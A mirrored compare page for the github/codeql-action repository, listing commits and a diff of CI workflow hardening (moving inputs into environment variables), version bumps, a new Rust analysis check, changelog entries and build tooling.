mirror of
https://github.com/github/codeql-action.git
synced 2025-12-11 10:14:33 +08:00
Compare commits
261 Commits
TEST
...
mbg/start-
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
b24bd4a46f | ||
|
|
6e35f86a20 | ||
|
|
f843d94177 | ||
|
|
2264a4ecc1 | ||
|
|
d3b65fcaf0 | ||
|
|
eea52ddc4e | ||
|
|
6ef9b921b1 | ||
|
|
4ffa2364a0 | ||
|
|
7e00290d34 | ||
|
|
259434501f | ||
|
|
28deaeda66 | ||
|
|
03c5d71c11 | ||
|
|
2a8cbadc02 | ||
|
|
f76eaf51a6 | ||
|
|
e63b3f5166 | ||
|
|
4c3e536282 | ||
|
|
56dd02f26d | ||
|
|
192406dd84 | ||
|
|
c7dbb2084e | ||
|
|
9a45cd8c50 | ||
|
|
d26c46acea | ||
|
|
51c83e1588 | ||
|
|
8774e3f945 | ||
|
|
45775bd823 | ||
|
|
dd78aab407 | ||
|
|
e40af59174 | ||
|
|
a35ae8c380 | ||
|
|
5bddbeb2bf | ||
|
|
c7102cdca1 | ||
|
|
a1ca4846bc | ||
|
|
bb59df6c17 | ||
|
|
4b508f5964 | ||
|
|
ca00afb5f1 | ||
|
|
2969c78ce0 | ||
|
|
fc7e4a0fa0 | ||
|
|
be0175c800 | ||
|
|
a8be43c24e | ||
|
|
94102d99b0 | ||
|
|
fd8685f16e | ||
|
|
56feaac968 | ||
|
|
362ef4ce20 | ||
|
|
2b85c00718 | ||
|
|
41aa437638 | ||
|
|
92864f48b0 | ||
|
|
e13fe0dd2d | ||
|
|
06703ce3e5 | ||
|
|
676a422916 | ||
|
|
498c7f37e8 | ||
|
|
efd29bef22 | ||
|
|
dab8a02091 | ||
|
|
10771737a9 | ||
|
|
17379bcd20 | ||
|
|
dbb232a3d8 | ||
|
|
4b72bef651 | ||
|
|
b53826d56d | ||
|
|
55ee663d5f | ||
|
|
a27e401674 | ||
|
|
a69f5113b7 | ||
|
|
b6f76bd566 | ||
|
|
01f1a1f2c9 | ||
|
|
efffb483ec | ||
|
|
f21cf0bbd7 | ||
|
|
72a2b1295e | ||
|
|
a022653e2d | ||
|
|
3c42562190 | ||
|
|
e4ca874973 | ||
|
|
e7f67e2e61 | ||
|
|
9f45e7498b | ||
|
|
73c938dbc0 | ||
|
|
2be6da694a | ||
|
|
76f9ed9cd9 | ||
|
|
71ab101d38 | ||
|
|
da967b1ade | ||
|
|
3c4533916b | ||
|
|
1994ea768e | ||
|
|
534bc63d5e | ||
|
|
3fbee52426 | ||
|
|
9bd18b486f | ||
|
|
0afd488dc1 | ||
|
|
c1fc897eb2 | ||
|
|
f88459c0a3 | ||
|
|
b22f3341fe | ||
|
|
486ab5a292 | ||
|
|
5275714183 | ||
|
|
08e5c8d618 | ||
|
|
be853de3b7 | ||
|
|
502426aa6b | ||
|
|
4cdde5c397 | ||
|
|
6ceaf4460c | ||
|
|
f15aac3db1 | ||
|
|
e149e39832 | ||
|
|
f313d62247 | ||
|
|
1b549b9259 | ||
|
|
82630c85f3 | ||
|
|
e0ea141027 | ||
|
|
b361a91508 | ||
|
|
bd1d9ab4ed | ||
|
|
b98ae6ca52 | ||
|
|
9825184a0a | ||
|
|
ac67cffe5c | ||
|
|
9c674ba4f5 | ||
|
|
d109dd5d33 | ||
|
|
3e5446c3d2 | ||
|
|
6adda79888 | ||
|
|
6be6984cc1 | ||
|
|
c50c157cc3 | ||
|
|
c74c378e29 | ||
|
|
d271bde0ec | ||
|
|
df9f80e0f0 | ||
|
|
46371933a7 | ||
|
|
ee6a063cbd | ||
|
|
5f8171a638 | ||
|
|
bb59f7707d | ||
|
|
8b0dccd066 | ||
|
|
6349095d19 | ||
|
|
d7d03fda12 | ||
|
|
4e3a5342c5 | ||
|
|
55f023701c | ||
|
|
6a151cd774 | ||
|
|
7866bcdb1b | ||
|
|
611289e0b0 | ||
|
|
4c409a5b66 | ||
|
|
70df9def86 | ||
|
|
5f98c40063 | ||
|
|
f338ec87a3 | ||
|
|
c31f6c89e8 | ||
|
|
251c7fdf5d | ||
|
|
afa3ed33bb | ||
|
|
f8367fb063 | ||
|
|
dc49dcabdb | ||
|
|
7254660adc | ||
|
|
13f2f96cdd | ||
|
|
0efe12d12c | ||
|
|
ff5f0b9efd | ||
|
|
270886f805 | ||
|
|
d3762699d1 | ||
|
|
b46b37a8a3 | ||
|
|
aecf01557d | ||
|
|
053e2184a0 | ||
|
|
248ab9b811 | ||
|
|
d76f393713 | ||
|
|
88676f2b14 | ||
|
|
b2e6519679 | ||
|
|
ff91c9db25 | ||
|
|
d1b3f740d8 | ||
|
|
6bb031afdd | ||
|
|
6bca7dd940 | ||
|
|
56b25d5d52 | ||
|
|
256aa16582 | ||
|
|
911d845ab6 | ||
|
|
7b7ed63503 | ||
|
|
608ccd6cd9 | ||
|
|
35d04d3627 | ||
|
|
ec3b22164b | ||
|
|
8dc01f6342 | ||
|
|
b378daf0bc | ||
|
|
80f9930395 | ||
|
|
f544ec5e4a | ||
|
|
d37931ae65 | ||
|
|
4b35b04661 | ||
|
|
1a69221aeb | ||
|
|
452ffd6e8e | ||
|
|
a8ade63a2f | ||
|
|
2db5b5a35f | ||
|
|
85e30fe57a | ||
|
|
83923549f6 | ||
|
|
96632630a9 | ||
|
|
97aac9bb56 | ||
|
|
d59d0eb99a | ||
|
|
0ae74e1ae0 | ||
|
|
146dd5cfb0 | ||
|
|
32505c6f2d | ||
|
|
8c69433c34 | ||
|
|
c4f2a076e5 | ||
|
|
a8849fbe63 | ||
|
|
628c1e669a | ||
|
|
e12eb8d7c1 | ||
|
|
3b348d9a54 | ||
|
|
7567eab606 | ||
|
|
a9f7529f47 | ||
|
|
5e88a178fe | ||
|
|
c0a8eb9a67 | ||
|
|
286fd68a67 | ||
|
|
d3c7d03197 | ||
|
|
03c921eac5 | ||
|
|
ff79de67cc | ||
|
|
5d1a3cb0ee | ||
|
|
2923046360 | ||
|
|
b56ba49b26 | ||
|
|
60c9c77c33 | ||
|
|
9856c48b1a | ||
|
|
9572e09da4 | ||
|
|
1a529366ac | ||
|
|
cf7e90952b | ||
|
|
b7006aab6d | ||
|
|
cfedae723e | ||
|
|
3971ed2a74 | ||
|
|
d38c6e60df | ||
|
|
c0d59dba56 | ||
|
|
c1745a9831 | ||
|
|
67e48c1eaf | ||
|
|
dbbcbe019d | ||
|
|
fb3e7cdd88 | ||
|
|
ff50469ca0 | ||
|
|
d0aab9fc20 | ||
|
|
c9ebc3bb8b | ||
|
|
a7b17782a9 | ||
|
|
f85d8b5a74 | ||
|
|
dae1626680 | ||
|
|
d99c7e8e5b | ||
|
|
eb88b40ca4 | ||
|
|
6b1da0d33e | ||
|
|
906452d251 | ||
|
|
0656d7fb91 | ||
|
|
1bb15d06a6 | ||
|
|
65a3aa1fbc | ||
|
|
acadfedea5 | ||
|
|
1930ca4359 | ||
|
|
1d4f241470 | ||
|
|
9dfa165835 | ||
|
|
47d5364431 | ||
|
|
30b1c2ae15 | ||
|
|
c4158ff890 | ||
|
|
2be5f244ff | ||
|
|
8c1551cdd4 | ||
|
|
fc4873bed7 | ||
|
|
c3ad6e9deb | ||
|
|
61c77a48ff | ||
|
|
4267fa66a2 | ||
|
|
c4a8587f45 | ||
|
|
77bc2a595e | ||
|
|
1c15a48f3f | ||
|
|
3df6d20d31 | ||
|
|
affec202b3 | ||
|
|
a963b41ebd | ||
|
|
683c0f5360 | ||
|
|
6063925771 | ||
|
|
67eb53aecb | ||
|
|
226ab86c29 | ||
|
|
078f43891a | ||
|
|
ccc5046d0b | ||
|
|
8c70d43f73 | ||
|
|
0a35e8f686 | ||
|
|
fb1a08b0c7 | ||
|
|
fc5ba27156 | ||
|
|
9e8d0789d4 | ||
|
|
43d9be6701 | ||
|
|
7b5dd253ad | ||
|
|
24e1c2d337 | ||
|
|
57a08c0c7f | ||
|
|
52189d23af | ||
|
|
08bc0cf022 | ||
|
|
cf7c687919 | ||
|
|
ad42dbd32d | ||
|
|
a8f5935da0 | ||
|
|
9660df3fcc | ||
|
|
3e913ef09d | ||
|
|
e456c53578 | ||
|
|
0d043c929c | ||
|
|
695f3263e3 | ||
|
|
7b4c9fef7d |
@@ -61,11 +61,12 @@ runs:
|
|||||||
- name: Check config
|
- name: Check config
|
||||||
working-directory: ${{ github.action_path }}
|
working-directory: ${{ github.action_path }}
|
||||||
shell: bash
|
shell: bash
|
||||||
run: ts-node ./index.ts "${{ runner.temp }}/user-config.yaml" '${{ inputs.expected-config-file-contents }}'
|
env:
|
||||||
|
EXPECTED_CONFIG_FILE_CONTENTS: '${{ inputs.expected-config-file-contents }}'
|
||||||
|
run: ts-node ./index.ts "$RUNNER_TEMP/user-config.yaml" "$EXPECTED_CONFIG_FILE_CONTENTS"
|
||||||
- name: Clean up
|
- name: Clean up
|
||||||
shell: bash
|
shell: bash
|
||||||
if: always()
|
if: always()
|
||||||
run: |
|
run: |
|
||||||
rm -rf ${{ runner.temp }}/codescanning-config-cli-test
|
rm -rf $RUNNER_TEMP/codescanning-config-cli-test
|
||||||
rm -rf ${{ runner.temp }}/user-config.yaml
|
rm -rf $RUNNER_TEMP/user-config.yaml
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ const actualConfig = loadActualConfig()
|
|||||||
|
|
||||||
const rawExpectedConfig = process.argv[3].trim()
|
const rawExpectedConfig = process.argv[3].trim()
|
||||||
if (!rawExpectedConfig) {
|
if (!rawExpectedConfig) {
|
||||||
core.info('No expected configuration provided')
|
core.setFailed('No expected configuration provided')
|
||||||
} else {
|
} else {
|
||||||
core.startGroup('Expected generated user config')
|
core.startGroup('Expected generated user config')
|
||||||
core.info(yaml.dump(JSON.parse(rawExpectedConfig)))
|
core.info(yaml.dump(JSON.parse(rawExpectedConfig)))
|
||||||
|
|||||||
21
.github/actions/prepare-test/action.yml
vendored
21
.github/actions/prepare-test/action.yml
vendored
@@ -29,24 +29,27 @@ runs:
|
|||||||
- id: get-url
|
- id: get-url
|
||||||
name: Determine URL
|
name: Determine URL
|
||||||
shell: bash
|
shell: bash
|
||||||
|
env:
|
||||||
|
VERSION: ${{ inputs.version }}
|
||||||
|
USE_ALL_PLATFORM_BUNDLE: ${{ inputs.use-all-platform-bundle }}
|
||||||
run: |
|
run: |
|
||||||
set -e # Fail this Action if `gh release list` fails.
|
set -e # Fail this Action if `gh release list` fails.
|
||||||
|
|
||||||
if [[ ${{ inputs.version }} == "linked" ]]; then
|
if [[ "$VERSION" == "linked" ]]; then
|
||||||
echo "tools-url=linked" >> "$GITHUB_OUTPUT"
|
echo "tools-url=linked" >> "$GITHUB_OUTPUT"
|
||||||
exit 0
|
exit 0
|
||||||
elif [[ ${{ inputs.version }} == "default" ]]; then
|
elif [[ "$VERSION" == "default" ]]; then
|
||||||
echo "tools-url=" >> "$GITHUB_OUTPUT"
|
echo "tools-url=" >> "$GITHUB_OUTPUT"
|
||||||
exit 0
|
exit 0
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [[ ${{ inputs.version }} == "nightly-latest" && "$RUNNER_OS" != "Windows" ]]; then
|
if [[ "$VERSION" == "nightly-latest" && "$RUNNER_OS" != "Windows" ]]; then
|
||||||
extension="tar.zst"
|
extension="tar.zst"
|
||||||
else
|
else
|
||||||
extension="tar.gz"
|
extension="tar.gz"
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [[ ${{ inputs.use-all-platform-bundle }} == "true" ]]; then
|
if [[ "$USE_ALL_PLATFORM_BUNDLE" == "true" ]]; then
|
||||||
artifact_name="codeql-bundle.$extension"
|
artifact_name="codeql-bundle.$extension"
|
||||||
elif [[ "$RUNNER_OS" == "Linux" ]]; then
|
elif [[ "$RUNNER_OS" == "Linux" ]]; then
|
||||||
artifact_name="codeql-bundle-linux64.$extension"
|
artifact_name="codeql-bundle-linux64.$extension"
|
||||||
@@ -59,14 +62,14 @@ runs:
|
|||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
if [[ ${{ inputs.version }} == "nightly-latest" ]]; then
|
if [[ "$VERSION" == "nightly-latest" ]]; then
|
||||||
tag=`gh release list --repo dsp-testing/codeql-cli-nightlies -L 1 | cut -f 3`
|
tag=`gh release list --repo dsp-testing/codeql-cli-nightlies -L 1 | cut -f 3`
|
||||||
echo "tools-url=https://github.com/dsp-testing/codeql-cli-nightlies/releases/download/$tag/$artifact_name" >> $GITHUB_OUTPUT
|
echo "tools-url=https://github.com/dsp-testing/codeql-cli-nightlies/releases/download/$tag/$artifact_name" >> $GITHUB_OUTPUT
|
||||||
elif [[ ${{ inputs.version }} == *"nightly"* ]]; then
|
elif [[ "$VERSION" == *"nightly"* ]]; then
|
||||||
version=`echo ${{ inputs.version }} | sed -e 's/^.*\-//'`
|
version=`echo "$VERSION" | sed -e 's/^.*\-//'`
|
||||||
echo "tools-url=https://github.com/dsp-testing/codeql-cli-nightlies/releases/download/codeql-bundle-$version/$artifact_name" >> $GITHUB_OUTPUT
|
echo "tools-url=https://github.com/dsp-testing/codeql-cli-nightlies/releases/download/codeql-bundle-$version/$artifact_name" >> $GITHUB_OUTPUT
|
||||||
elif [[ ${{ inputs.version }} == *"stable"* ]]; then
|
elif [[ "$VERSION" == *"stable"* ]]; then
|
||||||
version=`echo ${{ inputs.version }} | sed -e 's/^.*\-//'`
|
version=`echo "$VERSION" | sed -e 's/^.*\-//'`
|
||||||
echo "tools-url=https://github.com/github/codeql-action/releases/download/codeql-bundle-$version/$artifact_name" >> $GITHUB_OUTPUT
|
echo "tools-url=https://github.com/github/codeql-action/releases/download/codeql-bundle-$version/$artifact_name" >> $GITHUB_OUTPUT
|
||||||
else
|
else
|
||||||
echo "::error::Unrecognized version specified!"
|
echo "::error::Unrecognized version specified!"
|
||||||
|
|||||||
7
.github/actions/release-branches/action.yml
vendored
7
.github/actions/release-branches/action.yml
vendored
@@ -18,8 +18,11 @@ runs:
|
|||||||
using: "composite"
|
using: "composite"
|
||||||
steps:
|
steps:
|
||||||
- id: branches
|
- id: branches
|
||||||
|
env:
|
||||||
|
MAJOR_VERSION: ${{ inputs.major_version }}
|
||||||
|
LATEST_TAG: ${{ inputs.latest_tag }}
|
||||||
run: |
|
run: |
|
||||||
python ${{ github.action_path }}/release-branches.py \
|
python ${{ github.action_path }}/release-branches.py \
|
||||||
--major-version ${{ inputs.major_version }} \
|
--major-version "$MAJOR_VERSION" \
|
||||||
--latest-tag ${{ inputs.latest_tag }}
|
--latest-tag "$LATEST_TAG"
|
||||||
shell: bash
|
shell: bash
|
||||||
|
|||||||
2
.github/workflows/__go-tracing-autobuilder.yml
generated
vendored
2
.github/workflows/__go-tracing-autobuilder.yml
generated
vendored
@@ -77,7 +77,7 @@ jobs:
|
|||||||
setup-kotlin: 'true'
|
setup-kotlin: 'true'
|
||||||
- uses: actions/setup-go@v5
|
- uses: actions/setup-go@v5
|
||||||
with:
|
with:
|
||||||
go-version: ~1.23.0
|
go-version: ~1.24.0
|
||||||
# to avoid potentially misleading autobuilder results where we expect it to download
|
# to avoid potentially misleading autobuilder results where we expect it to download
|
||||||
# dependencies successfully, but they actually come from a warm cache
|
# dependencies successfully, but they actually come from a warm cache
|
||||||
cache: false
|
cache: false
|
||||||
|
|||||||
2
.github/workflows/__go-tracing-custom-build-steps.yml
generated
vendored
2
.github/workflows/__go-tracing-custom-build-steps.yml
generated
vendored
@@ -77,7 +77,7 @@ jobs:
|
|||||||
setup-kotlin: 'true'
|
setup-kotlin: 'true'
|
||||||
- uses: actions/setup-go@v5
|
- uses: actions/setup-go@v5
|
||||||
with:
|
with:
|
||||||
go-version: ~1.23.0
|
go-version: ~1.24.0
|
||||||
# to avoid potentially misleading autobuilder results where we expect it to download
|
# to avoid potentially misleading autobuilder results where we expect it to download
|
||||||
# dependencies successfully, but they actually come from a warm cache
|
# dependencies successfully, but they actually come from a warm cache
|
||||||
cache: false
|
cache: false
|
||||||
|
|||||||
2
.github/workflows/__go-tracing-legacy-workflow.yml
generated
vendored
2
.github/workflows/__go-tracing-legacy-workflow.yml
generated
vendored
@@ -77,7 +77,7 @@ jobs:
|
|||||||
setup-kotlin: 'true'
|
setup-kotlin: 'true'
|
||||||
- uses: actions/setup-go@v5
|
- uses: actions/setup-go@v5
|
||||||
with:
|
with:
|
||||||
go-version: ~1.23.0
|
go-version: ~1.24.0
|
||||||
# to avoid potentially misleading autobuilder results where we expect it to download
|
# to avoid potentially misleading autobuilder results where we expect it to download
|
||||||
# dependencies successfully, but they actually come from a warm cache
|
# dependencies successfully, but they actually come from a warm cache
|
||||||
cache: false
|
cache: false
|
||||||
|
|||||||
2
.github/workflows/__rubocop-multi-language.yml
generated
vendored
2
.github/workflows/__rubocop-multi-language.yml
generated
vendored
@@ -46,7 +46,7 @@ jobs:
|
|||||||
use-all-platform-bundle: 'false'
|
use-all-platform-bundle: 'false'
|
||||||
setup-kotlin: 'true'
|
setup-kotlin: 'true'
|
||||||
- name: Set up Ruby
|
- name: Set up Ruby
|
||||||
uses: ruby/setup-ruby@2654679fe7f7c29875c669398a8ec0791b8a64a1 # v1.215.0
|
uses: ruby/setup-ruby@354a1ad156761f5ee2b7b13fa8e09943a5e8d252 # v1.229.0
|
||||||
with:
|
with:
|
||||||
ruby-version: 2.6
|
ruby-version: 2.6
|
||||||
- name: Install Code Scanning integration
|
- name: Install Code Scanning integration
|
||||||
|
|||||||
71
.github/workflows/__rust.yml
generated
vendored
Normal file
71
.github/workflows/__rust.yml
generated
vendored
Normal file
@@ -0,0 +1,71 @@
|
|||||||
|
# Warning: This file is generated automatically, and should not be modified.
|
||||||
|
# Instead, please modify the template in the pr-checks directory and run:
|
||||||
|
# (cd pr-checks; pip install ruamel.yaml@0.17.31 && python3 sync.py)
|
||||||
|
# to regenerate this file.
|
||||||
|
|
||||||
|
name: PR Check - Rust analysis
|
||||||
|
env:
|
||||||
|
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
GO111MODULE: auto
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- main
|
||||||
|
- releases/v*
|
||||||
|
pull_request:
|
||||||
|
types:
|
||||||
|
- opened
|
||||||
|
- synchronize
|
||||||
|
- reopened
|
||||||
|
- ready_for_review
|
||||||
|
schedule:
|
||||||
|
- cron: '0 5 * * *'
|
||||||
|
workflow_dispatch: {}
|
||||||
|
jobs:
|
||||||
|
rust:
|
||||||
|
strategy:
|
||||||
|
fail-fast: false
|
||||||
|
matrix:
|
||||||
|
include:
|
||||||
|
- os: ubuntu-latest
|
||||||
|
version: linked
|
||||||
|
- os: ubuntu-latest
|
||||||
|
version: default
|
||||||
|
- os: ubuntu-latest
|
||||||
|
version: nightly-latest
|
||||||
|
name: Rust analysis
|
||||||
|
permissions:
|
||||||
|
contents: read
|
||||||
|
security-events: read
|
||||||
|
timeout-minutes: 45
|
||||||
|
runs-on: ${{ matrix.os }}
|
||||||
|
steps:
|
||||||
|
- name: Check out repository
|
||||||
|
uses: actions/checkout@v4
|
||||||
|
- name: Prepare test
|
||||||
|
id: prepare-test
|
||||||
|
uses: ./.github/actions/prepare-test
|
||||||
|
with:
|
||||||
|
version: ${{ matrix.version }}
|
||||||
|
use-all-platform-bundle: 'false'
|
||||||
|
setup-kotlin: 'true'
|
||||||
|
- uses: ./../action/init
|
||||||
|
with:
|
||||||
|
languages: rust
|
||||||
|
tools: ${{ steps.prepare-test.outputs.tools-url }}
|
||||||
|
env:
|
||||||
|
CODEQL_ACTION_RUST_ANALYSIS: true
|
||||||
|
- uses: ./../action/analyze
|
||||||
|
id: analysis
|
||||||
|
with:
|
||||||
|
upload-database: false
|
||||||
|
- name: Check database
|
||||||
|
shell: bash
|
||||||
|
run: |
|
||||||
|
RUST_DB="${{ fromJson(steps.analysis.outputs.db-locations).rust }}"
|
||||||
|
if [[ ! -d "$RUST_DB" ]]; then
|
||||||
|
echo "Did not create a database for Rust."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
env:
|
||||||
|
CODEQL_ACTION_TEST_MODE: true
|
||||||
2
.github/workflows/codeql.yml
vendored
2
.github/workflows/codeql.yml
vendored
@@ -75,7 +75,7 @@ jobs:
|
|||||||
strategy:
|
strategy:
|
||||||
fail-fast: false
|
fail-fast: false
|
||||||
matrix:
|
matrix:
|
||||||
os: [ubuntu-20.04,ubuntu-22.04,windows-2019,windows-2022,macos-13,macos-14]
|
os: [ubuntu-22.04,ubuntu-24.04,windows-2019,windows-2022,macos-13,macos-14]
|
||||||
tools: ${{ fromJson(needs.check-codeql-versions.outputs.versions) }}
|
tools: ${{ fromJson(needs.check-codeql-versions.outputs.versions) }}
|
||||||
runs-on: ${{ matrix.os }}
|
runs-on: ${{ matrix.os }}
|
||||||
|
|
||||||
|
|||||||
2
.github/workflows/post-release-mergeback.yml
vendored
2
.github/workflows/post-release-mergeback.yml
vendored
@@ -168,7 +168,7 @@ jobs:
|
|||||||
--draft
|
--draft
|
||||||
|
|
||||||
- name: Generate token
|
- name: Generate token
|
||||||
uses: actions/create-github-app-token@c1a285145b9d317df6ced56c09f525b5c2b6f755
|
uses: actions/create-github-app-token@v2.0.2
|
||||||
id: app-token
|
id: app-token
|
||||||
with:
|
with:
|
||||||
app-id: ${{ vars.AUTOMATION_APP_ID }}
|
app-id: ${{ vars.AUTOMATION_APP_ID }}
|
||||||
|
|||||||
2
.github/workflows/update-release-branch.yml
vendored
2
.github/workflows/update-release-branch.yml
vendored
@@ -124,7 +124,7 @@ jobs:
|
|||||||
pull-requests: write # needed to create pull request
|
pull-requests: write # needed to create pull request
|
||||||
steps:
|
steps:
|
||||||
- name: Generate token
|
- name: Generate token
|
||||||
uses: actions/create-github-app-token@c1a285145b9d317df6ced56c09f525b5c2b6f755
|
uses: actions/create-github-app-token@v2.0.2
|
||||||
id: app-token
|
id: app-token
|
||||||
with:
|
with:
|
||||||
app-id: ${{ vars.AUTOMATION_APP_ID }}
|
app-id: ${{ vars.AUTOMATION_APP_ID }}
|
||||||
|
|||||||
@@ -1,20 +1,20 @@
|
|||||||
repos:
|
repos:
|
||||||
- repo: local
|
- repo: local
|
||||||
hooks:
|
hooks:
|
||||||
|
- id: lint-ts
|
||||||
|
name: Lint typescript code
|
||||||
|
files: \.ts$
|
||||||
|
language: system
|
||||||
|
entry: npm run lint -- --fix
|
||||||
- id: compile-ts
|
- id: compile-ts
|
||||||
name: Compile typescript
|
name: Compile typescript
|
||||||
files: \.[tj]s$
|
files: \.[tj]s$
|
||||||
language: system
|
language: system
|
||||||
entry: npm run build
|
entry: npm run build
|
||||||
pass_filenames: false
|
pass_filenames: false
|
||||||
- id: lint-ts
|
|
||||||
name: Lint typescript code
|
|
||||||
files: \.ts$
|
|
||||||
language: system
|
|
||||||
entry: npm run lint -- --fix
|
|
||||||
- id: pr-checks-sync
|
- id: pr-checks-sync
|
||||||
name: Synchronize PR check workflows
|
name: Synchronize PR check workflows
|
||||||
files: ^.github/workflows/__.*\.yml$|^pr-checks
|
files: ^.github/workflows/__.*\.yml$|^pr-checks
|
||||||
language: system
|
language: system
|
||||||
entry: python3 pr-checks/sync.py
|
entry: pr-checks/sync.sh
|
||||||
pass_filenames: false
|
pass_filenames: false
|
||||||
|
|||||||
34
CHANGELOG.md
34
CHANGELOG.md
@@ -6,6 +6,40 @@ See the [releases page](https://github.com/github/codeql-action/releases) for th
|
|||||||
|
|
||||||
No user facing changes.
|
No user facing changes.
|
||||||
|
|
||||||
|
## 3.28.16 - 23 Apr 2025
|
||||||
|
|
||||||
|
- Update default CodeQL bundle version to 2.21.1. [#2863](https://github.com/github/codeql-action/pull/2863)
|
||||||
|
|
||||||
|
## 3.28.15 - 07 Apr 2025
|
||||||
|
|
||||||
|
- Fix bug where the action would fail if it tried to produce a debug artifact with more than 65535 files. [#2842](https://github.com/github/codeql-action/pull/2842)
|
||||||
|
|
||||||
|
## 3.28.14 - 07 Apr 2025
|
||||||
|
|
||||||
|
- Update default CodeQL bundle version to 2.21.0. [#2838](https://github.com/github/codeql-action/pull/2838)
|
||||||
|
|
||||||
|
## 3.28.13 - 24 Mar 2025
|
||||||
|
|
||||||
|
No user facing changes.
|
||||||
|
|
||||||
|
## 3.28.12 - 19 Mar 2025
|
||||||
|
|
||||||
|
- Dependency caching should now cache more dependencies for Java `build-mode: none` extractions. This should speed up workflows and avoid inconsistent alerts in some cases.
|
||||||
|
- Update default CodeQL bundle version to 2.20.7. [#2810](https://github.com/github/codeql-action/pull/2810)
|
||||||
|
|
||||||
|
## 3.28.11 - 07 Mar 2025
|
||||||
|
|
||||||
|
- Update default CodeQL bundle version to 2.20.6. [#2793](https://github.com/github/codeql-action/pull/2793)
|
||||||
|
|
||||||
|
## 3.28.10 - 21 Feb 2025
|
||||||
|
|
||||||
|
- Update default CodeQL bundle version to 2.20.5. [#2772](https://github.com/github/codeql-action/pull/2772)
|
||||||
|
- Address an issue where the CodeQL Bundle would occasionally fail to decompress on macOS. [#2768](https://github.com/github/codeql-action/pull/2768)
|
||||||
|
|
||||||
|
## 3.28.9 - 07 Feb 2025
|
||||||
|
|
||||||
|
- Update default CodeQL bundle version to 2.20.4. [#2753](https://github.com/github/codeql-action/pull/2753)
|
||||||
|
|
||||||
## 3.28.8 - 29 Jan 2025
|
## 3.28.8 - 29 Jan 2025
|
||||||
|
|
||||||
- Enable support for Kotlin 2.1.10 when running with CodeQL CLI v2.20.3. [#2744](https://github.com/github/codeql-action/pull/2744)
|
- Enable support for Kotlin 2.1.10 when running with CodeQL CLI v2.20.3. [#2744](https://github.com/github/codeql-action/pull/2744)
|
||||||
|
|||||||
30
justfile
Normal file
30
justfile
Normal file
@@ -0,0 +1,30 @@
|
|||||||
|
# Perform all working copy cleanup operations
|
||||||
|
all: lint sync
|
||||||
|
|
||||||
|
# Lint source typescript
|
||||||
|
lint:
|
||||||
|
npm run lint-fix
|
||||||
|
|
||||||
|
# Sync generated files (javascript and PR checks)
|
||||||
|
sync: build update-pr-checks
|
||||||
|
|
||||||
|
# Perform all necessary steps to update the PR checks
|
||||||
|
update-pr-checks:
|
||||||
|
pr-checks/sync.sh
|
||||||
|
|
||||||
|
# Transpile typescript code into javascript
|
||||||
|
build:
|
||||||
|
npm run build
|
||||||
|
|
||||||
|
# Build then run all the tests
|
||||||
|
test: build
|
||||||
|
npm run test
|
||||||
|
|
||||||
|
# Run the tests for a single file
|
||||||
|
test_file filename: build
|
||||||
|
npx ava --verbose {{filename}}
|
||||||
|
|
||||||
|
[doc("Refresh the .js build artefacts in the lib directory")]
|
||||||
|
[confirm]
|
||||||
|
refresh-lib:
|
||||||
|
rm -rf lib && npm run build
|
||||||
16
lib/analyze-action-post.js
generated
16
lib/analyze-action-post.js
generated
@@ -38,12 +38,14 @@ Object.defineProperty(exports, "__esModule", { value: true });
|
|||||||
* It will run after the all steps in this job, in reverse order in relation to
|
* It will run after the all steps in this job, in reverse order in relation to
|
||||||
* other `post:` hooks.
|
* other `post:` hooks.
|
||||||
*/
|
*/
|
||||||
|
const fs = __importStar(require("fs"));
|
||||||
const core = __importStar(require("@actions/core"));
|
const core = __importStar(require("@actions/core"));
|
||||||
const actionsUtil = __importStar(require("./actions-util"));
|
const actionsUtil = __importStar(require("./actions-util"));
|
||||||
const api_client_1 = require("./api-client");
|
const api_client_1 = require("./api-client");
|
||||||
const codeql_1 = require("./codeql");
|
const codeql_1 = require("./codeql");
|
||||||
const config_utils_1 = require("./config-utils");
|
const config_utils_1 = require("./config-utils");
|
||||||
const debugArtifacts = __importStar(require("./debug-artifacts"));
|
const debugArtifacts = __importStar(require("./debug-artifacts"));
|
||||||
|
const dependency_caching_1 = require("./dependency-caching");
|
||||||
const environment_1 = require("./environment");
|
const environment_1 = require("./environment");
|
||||||
const logging_1 = require("./logging");
|
const logging_1 = require("./logging");
|
||||||
const util_1 = require("./util");
|
const util_1 = require("./util");
|
||||||
@@ -60,7 +62,19 @@ async function runWrapper() {
|
|||||||
if (config !== undefined) {
|
if (config !== undefined) {
|
||||||
const codeql = await (0, codeql_1.getCodeQL)(config.codeQLCmd);
|
const codeql = await (0, codeql_1.getCodeQL)(config.codeQLCmd);
|
||||||
const version = await codeql.getVersion();
|
const version = await codeql.getVersion();
|
||||||
await (0, logging_1.withGroup)("Uploading combined SARIF debug artifact", () => debugArtifacts.uploadCombinedSarifArtifacts(logger, config.gitHubVersion.type, version.version));
|
await debugArtifacts.uploadCombinedSarifArtifacts(logger, config.gitHubVersion.type, version.version);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// If we analysed Java in build-mode: none, we may have downloaded dependencies
|
||||||
|
// to the temp directory. Clean these up so they don't persist unnecessarily
|
||||||
|
// long on self-hosted runners.
|
||||||
|
const javaTempDependencyDir = (0, dependency_caching_1.getJavaTempDependencyDir)();
|
||||||
|
if (fs.existsSync(javaTempDependencyDir)) {
|
||||||
|
try {
|
||||||
|
fs.rmSync(javaTempDependencyDir, { recursive: true });
|
||||||
|
}
|
||||||
|
catch (error) {
|
||||||
|
logger.info(`Failed to remove temporary Java dependencies directory: ${(0, util_1.getErrorMessage)(error)}`);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
